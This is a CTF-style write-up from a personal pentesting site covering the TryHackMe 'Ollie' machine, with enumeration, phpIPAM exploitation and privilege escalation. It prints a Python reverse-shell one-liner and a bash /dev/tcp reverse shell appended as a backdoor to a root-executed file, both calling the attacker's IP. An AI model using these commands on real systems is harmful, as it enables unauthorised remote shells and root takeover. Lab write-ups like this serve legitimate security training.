GeorgeBanu
  • About me
  • Pentesting CheatSheets
    • Information Gathering
    • Ports Enumeration
      • FTP-21
      • SSH-22
      • Telnet-23
      • SMTP - 25,465,587
      • DNS-53
      • NetBIOS, SMB - 139,445
      • SNMP-161
      • MySQL-3306
      • RDP-3389
      • WinRM-5985
    • Web Cheat Sheet
    • Privilege Escalation
      • Linux Enumeration
      • Linux Privesc Techniques
    • Tricks
    • Template
  • TryHackMe Writeups
    • Starter
    • Dreaming
    • ColddBox: Easy
    • Ollie
    • Blog
    • KoTH Hackers
    • Brooklyn Nine Nine
    • Chill Hack
    • Undiscovered
    • Archangel
    • Jason
    • GLITCH
    • VulnNet: Node
    • Road
    • VulnNet:Internal
    • W1seGuy
  • CyberEDU Writeups
    • flag-is-hidden
    • file-crawler
    • reccon
    • this-file-hides-something
    • wifiland
    • old-tickets
    • inodat
    • pattern
    • ultra-crawl
  • eJPT
Powered by GitBook
On this page
  • Lab Setup
  • Enumeration
  • Exploitation
  • Privilege Escalation
  1. TryHackMe Writeups

Ollie

PreviousColddBox: EasyNextBlog

Last updated 1 year ago

Lab Setup

mkdir ~/Documents/TryHackMe/ollie
cd ~/Documents/TryHackMe/ollie
mkdir recon enumeration notes
touch notes{README.md,vulns,creds}


export IP=10.10.156.24
export URL=http://$IP

Enumeration

To begin, perform a comprehensive scan of the machine's open ports using both rustscan and nmap. This dual approach ensures a thorough examination of the network, providing a more detailed understanding of the available services and potential vulnerabilities.

  • nmap

nmap -Pn -p- -v -T4 --max-retries 5 $IP -oN recon/nmap.init;
cat recon/nmap.init | grep '/.*open'| cut -d '/' -f 1| tr '\n' ', '| sed 's/.$//g' > recon/ports;
sudo nmap -Pn -sS -sV -n -v -A -T4 -p $(cat recon/ports) $IP -oN recon/nmap.alltcp

  • rutscan

rustscan -a $IP --ulimit 5000 -- -sC -sV -v -oN recon/rustscan.init

Looks like I found 3 open ports. I begin to enumerate the 1337 port. Try to establish a connection with nc command and you will get website credentials. 

nc $IP 1337

Use this credentials to login and now let's enumerate the website. To obtain a reverse shell it is quite simple. I see that it is about phpIPAM, so search in exploit-db.

I found an python script and you will add an evil.php file.

Exploitation

Use this to get a reverse shell.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.113.25",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

After a lot of enumeration I discover that all I need to do is change the user to ollie and use the password that I found from 1337 port connection.

Privilege Escalation

After some while I found a file that can be modified by user ollie and it executes as root. So put a backdoor and you will get a shell as root.

ollie@hackerdog:/usr/bin$ echo 'bash -i >& /dev/tcp/10.8.113.25/8888 0>&1' >> /usr/bin/feedme

Open a netcat listener and wait for a while.

┌──(kali㉿kali)-[~/Documents/TryHackMe/ollie]
└─$ rlwrap nc -lnvp 8888                        
listening on [any] 8888 ...
connect to [10.8.113.25] from (UNKNOWN) [10.10.97.198] 37274
bash: cannot set terminal process group (4102): Inappropriate ioctl for device
bash: no job control in this shell
root@hackerdog:/# whoami 
whoami 
root